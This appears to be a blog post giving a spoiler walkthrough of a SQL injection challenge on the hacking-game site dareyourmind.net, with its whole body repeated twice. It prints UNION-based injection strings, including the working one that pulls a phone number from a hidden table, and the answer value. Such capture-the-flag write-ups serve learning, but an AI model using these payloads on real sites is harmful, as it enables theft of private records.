Dare Your Mind
This evening I was approached by an internet drifter about a SQL injection problem. He was playing an online hacker game located at http://www.dareyourmind.net.
His problem was with the page http://www.dareyourmind.net/menu.php?page=sqlexploit3.
At first glance I thought "SQL exploit", then I read the information left by the author:
Listito has modified his girls contact php form to obtain fastly phone numbers... Because you have not the right session cookie, you cannot see phone list but you have to find even though the phone number of Nicole to validate this chall !
So my next thought was 'oh, session hijacking...TCP?....cookie...hmmm...XSS?'
The drifter assured me that I didn't have to try XSS, he'd found some SQL injection:
1 union all select *,null,null,null from information_schema.tables #
Which didn't quite work. I promised to take a look, and went off to dinner.
Once I returned, the first thing I did was open WebScarab and intercepted all GET and POST's from my browser. Wow, this site was prepared. It tossed in lots of background noise, so I disabled the "GET" and focused only on POST, which is where the id=1 string was passed to http://www.dareyourmind.net/real/sql3/list.php. (Warning, this is hardly work safe!)
As it turns out, there are four columns. I was already told that much.
After little more than 30 minutes, the correct string is: (hidden, black text on black background, highlight below the 'spoiler' snips)
--SPOILER BELOW--
id=3 union select null,Phone,null,null from __User__SQL_THREE_ where ID = 3 --
Which means the answer is: 1425753498 (though that will probably change when the author gets word that it has been posted.)
--SPOILER ABOVE--
No, I'm not trying to ruin the game. You should go figure out how each statement works, and how to SQL inject on your own. This is a spoiler for those lamers who can't figure it out. I wont post any more answers from the dareyourmind.net challenges, and I wont help you if you track me down. I was bored, this challenge was tempting...and it has been awhile since I posted something.
His problem was with the page http://www.dareyourmind.net/menu.php?page=sqlexploit3.
At first glance I thought "SQL exploit", then I read the information left by the author:
Listito has modified his girls contact php form to obtain fastly phone numbers... Because you have not the right session cookie, you cannot see phone list but you have to find even though the phone number of Nicole to validate this chall !
So my next thought was 'oh, session hijacking...TCP?....cookie...hmmm...XSS?'
The drifter assured me that I didn't have to try XSS, he'd found some SQL injection:
1 union all select *,null,null,null from information_schema.tables #
Which didn't quite work. I promised to take a look, and went off to dinner.
Once I returned, the first thing I did was open WebScarab and intercepted all GET and POST's from my browser. Wow, this site was prepared. It tossed in lots of background noise, so I disabled the "GET" and focused only on POST, which is where the id=1 string was passed to http://www.dareyourmind.net/real/sql3/list.php. (Warning, this is hardly work safe!)
As it turns out, there are four columns. I was already told that much.
After little more than 30 minutes, the correct string is: (hidden, black text on black background, highlight below the 'spoiler' snips)
--SPOILER BELOW--
id=3 union select null,Phone,null,null from __User__SQL_THREE_ where ID = 3 --
Which means the answer is: 1425753498 (though that will probably change when the author gets word that it has been posted.)
--SPOILER ABOVE--
No, I'm not trying to ruin the game. You should go figure out how each statement works, and how to SQL inject on your own. This is a spoiler for those lamers who can't figure it out. I wont post any more answers from the dareyourmind.net challenges, and I wont help you if you track me down. I was bored, this challenge was tempting...and it has been awhile since I posted something.
posted by wiretapp at
19:56
